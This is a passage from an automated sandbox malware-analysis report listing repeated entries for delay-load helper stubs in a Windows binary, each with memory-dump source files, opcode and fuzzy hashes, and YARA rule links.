                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: deb3644f67adf01b7d5ed0fbe18101613ffd55623030b2053f0363de41204a4f
                                                                  • Instruction ID: c4b818b5f990db8fd284ff6e9542c66c12103c6b88d660503306aceaf9b76e6d
                                                                  • Opcode Fuzzy Hash: deb3644f67adf01b7d5ed0fbe18101613ffd55623030b2053f0363de41204a4f
                                                                  • Instruction Fuzzy Hash: DFB09299258000AC2544A11B1C02D7A018CC082B11330842FF805C2080A958AC01193B
                                                                  Function 0046E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 43e776b4d3e982a6d65f3f105cab93bc97ce6ee7ea0ce935e3296203f9d10d88
                                                                  • Instruction ID: dff7a43ea038e03146b984a7b81f7d3c1b45ca359dd9b8379f148be816fb0ab7
                                                                  • Opcode Fuzzy Hash: 43e776b4d3e982a6d65f3f105cab93bc97ce6ee7ea0ce935e3296203f9d10d88
                                                                  • Instruction Fuzzy Hash: DDB09299258140BC2184620B1802D7A018CC081B11330852FB805C2180A858AC45193B
                                                                  Function 0046E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 357913b0a1af0d8a80eb81d0253576d7811af238630688548f6927e4a6827f18
                                                                  • Instruction ID: eb2fc2727b3dad70e3707f0d93b9c9627db74860422716ab4658a5bd867529dd
                                                                  • Opcode Fuzzy Hash: 357913b0a1af0d8a80eb81d0253576d7811af238630688548f6927e4a6827f18
                                                                  • Instruction Fuzzy Hash: AFB09299298000AC2144620B1902D7A018CC081B11330842FB805C2180A868AD0A193B
                                                                  Function 0046E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 3aba68a9146115427d0f037f099707082f88be1796e7deacf19ab7386780a433
                                                                  • Instruction ID: 2247bc459b67c20bf8ef1f69a2e096a26e94c71d3578c55129b0a715cd5432ee
                                                                  • Opcode Fuzzy Hash: 3aba68a9146115427d0f037f099707082f88be1796e7deacf19ab7386780a433
                                                                  • Instruction Fuzzy Hash: 41B092A9258000BC2144650B1802D7A018CC482B11330842FF805C2080A858AD01193B
                                                                  Function 0046E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 461477285ff8755a739bf2689368dab1147b3db788c9929a25969f3bb3b73b07
                                                                  • Instruction ID: 633101b38d129adb13cc16f043f9ae65cb4410a6d677d28e5b13a3bb85329755
                                                                  • Opcode Fuzzy Hash: 461477285ff8755a739bf2689368dab1147b3db788c9929a25969f3bb3b73b07
                                                                  • Instruction Fuzzy Hash: DAB092A9258100BC2184650B1802D7A018CC081B11330852FB805C2080A858AD41193B
                                                                  Function 0046E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: f52aea37c8f9541718f30676c8c66b09d38738336d1ffaa62dfd1edeadcaad63
                                                                  • Instruction ID: fe4cc8db85fa2bcc290ea176713f1a3b83c4df1c16c2b79b3eac1f6d417c4897
                                                                  • Opcode Fuzzy Hash: f52aea37c8f9541718f30676c8c66b09d38738336d1ffaa62dfd1edeadcaad63
                                                                  • Instruction Fuzzy Hash: 74B092A9298000AC2144650B1912D7A018CC081B11330842FB805C2080E858AE02193B
                                                                  Function 0046E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 970f8339bea60ad71e26898c6fadbe3db20f03f563e7130034a496890bd310fc
                                                                  • Instruction ID: ce3e62205c231c5dbd788bbc86e0a16f39411df2767419de0e584c34d47182cc
                                                                  • Opcode Fuzzy Hash: 970f8339bea60ad71e26898c6fadbe3db20f03f563e7130034a496890bd310fc
                                                                  • Instruction Fuzzy Hash: A6B092A9258000AC3144650B1802D7A018CC081B11330842FB805C2080A868AD01193B
                                                                  Function 0046EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046EAF9
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: 3Qo
                                                                  • API String ID: 1269201914-1944013411
                                                                  • Opcode ID: 91cb560bdf40f2049ba60565fe15e5c5d516a5aac47f05bddc3087c0bf5c0d6e
                                                                  • Instruction ID: f09b5dc1b109cf60697a7cc3f2e502d86c6dc494e20bf367200c57b0c6da8fc1
                                                                  • Opcode Fuzzy Hash: 91cb560bdf40f2049ba60565fe15e5c5d516a5aac47f05bddc3087c0bf5c0d6e
                                                                  • Instruction Fuzzy Hash: 91B092CA29A0427C220472431942C3A0148C580B91330842FB40095081B8880C06083B
                                                                  Function 0046E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 3e2a9cc56742ac775057549b35c904ecc935fb81e84b30a482aa6d52a9653ed2
                                                                  • Instruction ID: d74042b2aef2addc60471e7b5e8a7541c5bd80ae807d560fa097ef6cfa62cec7
                                                                  • Opcode Fuzzy Hash: 3e2a9cc56742ac775057549b35c904ecc935fb81e84b30a482aa6d52a9653ed2
                                                                  • Instruction Fuzzy Hash: B2B012E9298000FC3544B10B1D02D7B01CCC0C1B11330843FF805C2080FC5CAD02193F
                                                                  Function 0046E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: fb8f74a4cd1d02fd743cb8e85ebb73d2cde4ad2a3837a1c6878cdb398223cba6
                                                                  • Instruction ID: f1a54a377df9c6d71daec48e9b6dc6ba6af7f467ecc75dcc26e78cafdd5989bc
                                                                  • Opcode Fuzzy Hash: fb8f74a4cd1d02fd743cb8e85ebb73d2cde4ad2a3837a1c6878cdb398223cba6
                                                                  • Instruction Fuzzy Hash: 09B09289258100BC2244714B9C02D7A0188C481B19330862FB405C2080B8481C45093F
                                                                  Function 0046E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E51F
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: PDGu<F
                                                                  • API String ID: 1269201914-164939742
                                                                  • Opcode ID: fa884e8d28bd209af9ed28df320cce34d83bb4af9244ab0a93dc1dc25090054b
                                                                  • Instruction ID: 29c6e3afbe58b7eb1bf4ea4a8526558cbbcce2c29518fca6fe8aee0593a93e86
                                                                  • Opcode Fuzzy Hash: fa884e8d28bd209af9ed28df320cce34d83bb4af9244ab0a93dc1dc25090054b
                                                                  • Instruction Fuzzy Hash: 10B012C92580007C3104316B5C06D7F014CC4C1F1D330853FF411D14C1B85C0D05083F
                                                                  Function 0046E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 5d14e557d79dc315e28e5a5058748226c633c03f11acb60ec9f1c73fe115dcee
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 5d14e557d79dc315e28e5a5058748226c633c03f11acb60ec9f1c73fe115dcee
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 8ae7c42506428b97710356355f00b5a84ea934755b5fb77b6a971c9f314d3c3c
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 8ae7c42506428b97710356355f00b5a84ea934755b5fb77b6a971c9f314d3c3c
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 863dff8857bfcda675b25b4dac74791ed52de01fb9803c37762144f1113dd29e
                                                                  • Instruction ID: 03d0a76dfa8be5e6548c9db6af0abca64741e42e84de38ea065f2b1398fc2a78
                                                                  • Opcode Fuzzy Hash: 863dff8857bfcda675b25b4dac74791ed52de01fb9803c37762144f1113dd29e
                                                                  • Instruction Fuzzy Hash: BEA011EA2A8002FC300832032C02C3B028CC0C2B20330882FF802C2080B8A8AC02283B
                                                                  Function 0046E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0046E1E3
                                                                    • Part of subcall function 0046E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0046E8D0
                                                                    • Part of subcall function 0046E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0046E8E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                  • String ID: F
                                                                  • API String ID: 1269201914-39334831
                                                                  • Opcode ID: 2cc0c111ef8e2895b1d4ab80adbd28845d7ea1aedac8cd422593d42d79059708
